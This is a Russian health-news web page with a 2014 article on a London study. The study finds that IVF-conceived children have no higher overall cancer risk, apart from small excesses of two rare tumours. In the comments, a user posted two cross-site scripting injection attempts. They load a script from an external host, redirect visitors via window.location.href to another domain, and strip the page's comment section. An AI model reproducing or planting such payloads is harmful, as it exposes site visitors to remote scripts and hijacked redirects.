Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  ЭКО не влияет на здоровье...  >>  ЭКО не влияет на здоровье детей
 
Обратная связь
 

ЭКО не влияет на здоровье детей

Размер шрифта
07 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Некоторые специалисты ранее утверждали, что у детей, рожденных в результате экстракорпорального оплодотворения, повышен риск развития рака. Новое исследование английских ученых опровергает данное заблуждение.

ЭКО не влияет на здоровье детей

На сегодняшний день более пяти миллионов детишек родились благодаря вспомогательным репродуктивным технологиям. Тем не менее, всегда существовали опасения, что вмешательство в тонкий процесс зачатия может привести к росту онкологического риска. Ученые из Университетского Колледжа в Лондоне решили провести исследование, чтобы расставить все точки над i в этом важнейшем вопросе.

«Мы исследовали более ста тысяч детей, зачатых в пробирке, и обнаружили в итоге, что риск рака у них точно такой же, как и у детей, которые родились в результате полового акта», – рассказывает доктор Алистер Сатклифф, ведущий автор исследования, специалист в области педиатрии. «Это, безусловно, обнадеживающий результат для миллионов детишек и их родственников».

В течение 16 лет (с 1992 по 2008 годы) ученые собирали информацию относительно 106 000 детей, зачатых с помощью ЭКО. Далее авторы сравнили число случаев рака в этой группе детей с общей популяцией моложе 15 лет.

За годы наблюдения исследователи зафиксировали 108 случаев злокачественного новообразования – против 110 в популяции в целом.

Впрочем, без ложки дегтя не обошлось. Хотя общий онкологический риск оказался в пределах статистической нормы, инцидентность двух не самых распространенных типов опухоли оказалась выше, чем ожидалось. Речь идет о гепатобластоме (один из вариантов рака печени) и рабдомиосаркоме (злокачественная опухоль мышечной ткани).

Отчасти подсластить эту неприятную пилюлю позволяет тот факт, что обе эти опухоли хорошо лечатся и прогноз их в целом благоприятен.

Исследование было положительно воспринято в научном сообществе, в том числе и за океаном – в США. К слову, статья была опубликована в самом авторитетном медицинском журнале в мире – New England Journal of Medicine.

«Результаты данной научной работы должны вселить оптимизм и развеять все страхи касательно экстракорпорального оплодотворения», – говорит доктор Лоренс Грюнфельд, доцент кафедры акушерства, гинекологии и репродуктивных технологий в клинике Маунт Синай (город Нью-Йорк).

Авторы обнаружили, что большинство медицинских проблем у детишек, зачатых с помощью ЭКО, связаны не с самой процедурой, а с генетическими рисками исходного заболевания, которое привело к бесплодию у одного из родителей.

Таким образом, можно с уверенностью утверждать, что технология ЭКО вполне безопасна для здоровья будущего малыша.

О других репродуктивных технологиях и не только читайте на страницах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:54

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Все, что вы помните о детстве, – неправда   Мы то, что мы пьем!   Что порядок рождения говорит о вас   Дети могут понимать друг друга без слов!  
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 03 октября 2013Результаты благотворительного марафона «Всем миром»
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Как правильно кормить грудью
Первые шаги вашего малыша
Как научить ребенка есть правильно. Что можно и нельзя

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.